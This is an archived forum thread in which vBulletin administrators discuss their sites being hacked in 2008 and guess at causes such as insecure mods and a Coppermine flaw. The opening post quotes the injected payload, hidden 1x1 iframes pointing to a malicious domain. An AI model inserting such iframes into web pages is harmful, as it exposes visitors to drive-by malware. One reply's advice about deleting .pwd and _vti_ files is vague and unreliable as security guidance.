PDA

View Full Version : Anyone been hacked since 3.6.9?

readjono
04-06-2008, 07:37 PM
I've just had a horrendous weekend trying to clean up my forum after a hacker managed to add loads of script to PHP files like this:

<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>

Anyone had any similar problems?
dtv100
04-06-2008, 08:02 PM
what hacks you have in your board?
readjono
04-06-2008, 08:04 PM
Quite a few actually. I didn't realise they posed such a security risk?
Lynne
04-06-2008, 08:06 PM
Quite a few actually. I didn't realise they posed such a security risk?
Sometimes they can. You need to keep up with any updates the author makes because sometimes they are security updates.
Marco van Herwaarden
04-07-2008, 07:05 AM
If they where able to edit PHP files, then it is more likely that the server is compromised.
topspeeforum
04-07-2008, 01:22 PM
this happened to someone i know the other day. Make sure you search your directory completely for any file with .pwd at the end. Also search your main server page for a file named _vti_(anything). Just delete all the vti folders and .pwd files if you see any. This is a way for hackers to get your passwords by typing in a certain address.
Shazz
04-08-2008, 02:17 AM
If they where able to edit PHP files, then it is more likely that the server is compromised.

Yea, pretty hard to go through vBulletin's admincp to get there :rolleyes:
SEOvB
04-08-2008, 02:37 AM
you can't edit php files thru the admincp? I'm not sure if thats what you were tryin to say or not though?
Marco van Herwaarden
04-12-2008, 10:41 AM
There are no options in default vBulletin that would allow for editing of php files.
turbosatan
04-12-2008, 12:14 PM
i got hacked a while ago and they edited the default template file to compromise my site and make a new page appear
Shazz
04-12-2008, 05:57 PM
i got hacked a while ago and they edited the default template file to compromise my site and make a new page appear

Most likely the forumhome template, did they know your password to the admincp?
turbosatan
04-13-2008, 06:30 PM
Most likely the forumhome template, did they know your password to the admincp?

i dont think so

i am of the mind that it was a unsafe insecure mod that i had installed. i have heard since that it is not safe
Marco van Herwaarden
04-14-2008, 07:15 AM
Which modification is this?
waynne
04-14-2008, 10:42 AM
This problem is related to a security issue in Coppermine please advise if you have coppermine installed. This thread will be of interest to those who have been recently hacked all writable pages have had an iframe code added to the end (all pages in the site!).

http://forum.coppermine-gallery.net/index.php/topic,51671.0.html